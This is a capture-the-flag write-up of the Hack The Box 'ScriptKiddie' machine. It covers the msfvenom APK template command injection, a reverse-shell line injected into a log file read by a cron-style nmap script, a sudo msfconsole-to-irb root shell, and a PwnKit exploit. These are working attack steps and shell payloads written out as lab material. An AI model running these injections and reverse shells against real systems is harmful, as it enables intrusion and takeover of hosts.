# 🕵 HTB-Writeup : SCRIPTKIDDIE
## Recon
```sh
└─$ rustscan -a 10.10.10.226 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
Open 10.10.10.226:22
Open 10.10.10.226:5000
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http syn-ack Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: GET POST HEAD OPTIONS
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We are face of a [Werkzeug](https://pypi.org/project/Werkzeug/) webserver. On the main page, we have access to 3 tools:
- nmap
- msfvenom
- searchsploit
## Vulnerability
The msfvenom tools here can generate Windows, Unix and Android payloads.
I first use `searchsploit`. I found some vulnerabilities on **Werkzeug**.
```sh
└─$ searchsploit Werkzeug
------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------ ---------------------------------
Pallets Werkzeug 0.15.4 - Path Trav | python/webapps/50101.py
Werkzeug - 'Debug Shell' Command Ex | multiple/remote/43905.py
Werkzeug - Debug Shell Command Exec | python/remote/37814.rb
------------------------------------ ---------------------------------
```
To be used, this exploit need an access to the *console* page of the **Werkzeug server** but we don't have an access to it on that Box. Exploit can't be used.
After some research, I found that the msfvenom tool is vulnerable to a [APK template command injection](https://nvd.nist.gov/vuln/detail/CVE-2020-7384)
I found an [article](https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) explaining that vulnerability.
The msfvenom Framework is vulnerable to command injection when the tools is used to craft an APK file using the `-x` switch. The option allow `msfvenom` to use an Android payload template to build the APK file.
We can use the `unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection` to craft our Android payloads template.
```sh
msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit() > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit() > set lhost 10.10.16.11
msf6 exploit() > exploit
[+] msf.apk stored at /home/pezzz/.msf4/local/msf.apk
```
We can now try to generate an APK file using our template.
We get our first shell as `kid`. We can get the user flag!
```sh
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.226] 47136
$ whoami
kid
$ cat /home/kid/user.txt
*************************ec7cb84
```
We can add our ssh key into `authorized_keys` to get a SSH access.
## Path to the privesc
### Local recon
I first run a [LinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) scan.
```sh
kid@scriptkiddie:~$ ./linpeas.sh -qN > out
# checking sudo version
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034
Vulnerable to CVE-2021-3560
# Checking last connection
╔══════════╣ Last time logon each user
Username Port From Latest
kid < thats me pts/0 10.10.16.11 Sat Sep 3 13:34:17 +0000 2022
pwn pts/1 10.10.14.7 Thu Jan 28 17:52:15 +0000 2021
```
We found 2 potentials interesting informations.
First, the sudo version (**v1.8.31**) seems to be vulnerable at **CVE-2021-4034** & **CVE-2021-3560**. Then, we see that the user `pwn` as been connected in the past from *10.10.14.7*. The IP is accessible.
---
In **/home/pwn** directory we can see a script :
```sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
The script is reading the text contained in **/home/kid/logs/hackers** and pass the IP to a nmap command.
I confirmed that by trying to create a file with `touch`, it worked.
Since we have write access on **/home/kid/logs/hackers** we can inject arbitrary commands that will be executed with **pwn** rights.
### Exploiting vulnerabilities
#### Exploiting *pwn* script
The text that we're going to put in **/home/kid/logs/hackers** must respect three things :
* a `;` to start the line in order to separate our command from the previous one
* a `#` to comment the rest of the line to avoid errors
* two characters before our command because `cut -d' ' -f3-` will cut them
So our command will be the following :
```sh=
a b ; bash -c '/bin/bash -i >& /dev/tcp/10.10.16.7/8888 0>&1' #
```
And we have now a shell as **pwn** :
```sh=
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.226] 54820
bash: cannot set terminal process group (866): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ id
id
uid=1001(pwn) gid=1001(pwn) groups=1001(pwn)
```
We can see that the user **pwn** can execute msfconsole as root without password :
```sh=
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
```
We can see in the help menu of msfconsole that we can obtain a ruby shell in the current context :
```sh=
Developer Commands
==================
Command Description
------- -----------
edit Edit the current module or a file with the preferred editor
irb Open an interactive Ruby shell in the current context
```
In this shell we can call **/bin/bash** : https://gtfobins.github.io/gtfobins/irb/
Unfortunately we have to upgrade our shell :
```sh=
stty: 'standard input': Inappropriate ioctl for device
```
I tried adding my ssh key but I don't have the access. Fortunately, a simple `python3 -c 'import pty; pty.spawn("/bin/bash")'` solved the issue.
We can now exploit the vulnerability :
```sh=
pwn@scriptkiddie:~$ sudo /opt/metasploit-framework-6.0.9/msfconsole
[...]
msf6 > irb
irb
[*] Starting IRB shell...
[*] You are in the "framework" object
irb: warn: can't alias jobs from irb_jobs.
>> exec '/bin/bash'
root@scriptkiddie:/home/pwn/.ssh# id
id
uid=0(root) gid=0(root) groups=0(root)
```
We can now retrieve the root flag.
#### Exploiting CVEs
I tried to exploit both **CVE** found from `LinPeas`.
-
-
The first vulnerability (**cve-2021-4034**) is a local privilege escalation done with the polkit's pkexec utility. `pkexec` "allows an authorized user to execute PROGRAM as another user". According to the NSE description, "the current version of pkexec doesn't handle the calling parameters count correctly and ends trying to execute environment variables as commands".
A user can manipulate PATHs and send bad arguments to force *pkexec* to execute commands. If we send a null argument to pkexec, it is possible to execute commands that have been set on environnement PATHs. [This article](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034) explain more specifically that vulnerability.
I found an [exploit on github](https://github.com/arthepsy/CVE-2021-4034/blob/main/cve-2021-4034-poc.c) that reproduce those steps.
```
# compiled exploit w/ gcc
kid@scriptkiddie:~$ gcc exploit.c -o exploit
# execute the exploit
kid@scriptkiddie:~$ ./exploit
$ whoami
root
$ cat /root/root.txt
*************************fa68e5c
```
The exploit works! We got a root shell and we can get our flag ! :)
## Tags
Easy, Internal, Use Of Injection Attacks, Metasploit, Ruby, Penetration Tester Level 1, OS Command Injection, Access Control, Backdoor, Public Vulnerabilities, CVE Exploitation, Sudo Exploitation, Security Tools, Weak Permissions